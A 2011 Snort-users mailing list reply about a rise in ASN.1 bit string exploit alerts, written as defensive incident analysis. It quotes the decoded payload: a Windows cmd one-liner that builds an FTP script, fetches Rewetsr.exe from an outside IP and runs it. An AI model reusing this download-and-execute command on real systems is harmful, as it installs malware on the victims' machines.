[Snort-users] Increase in ASN.1 alerts
michael.scheidell at ...8144...
Wed Feb 2 20:52:55 EST 2011
On 2/2/11 12:53 PM, Joe Gedeon wrote:
> Has anyone else noticed an increase in the number of alerts for
> SPECIFIC-THREATS ASN.1 constructed bit string? The payload seems
> different than the kill-bill script.
yep, over the weekend.
one of our new guys decided to decode it, and got this:
combined the payloads from the ASN.1 and the NOOPs, decoded it and found
the following command buried in the overflow padding....
cmd /c echo open 220.127.116.11 21 > o&echo user 1 1 >> o &echo get
Rewetsr.exe >> o &echo quit >> o &ftp -n -s:o &Rewetsr.exe
Michael Scheidell, CTO
>*| *SECNAP Network Security Corporation
* Certified SNORT Integrator
* 2008-9 Hot Company Award Winner, World Executive Alliance
* Five-Star Partner Program 2009, VARBusiness
* Best in Email Security,2010: Network Products Guide
* King of Spam Filters, SC Magazine 2008
This email has been scanned and certified safe by SpammerTrap(r).
For Information please see http://www.secnap.com/products/spammertrap/
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Snort-users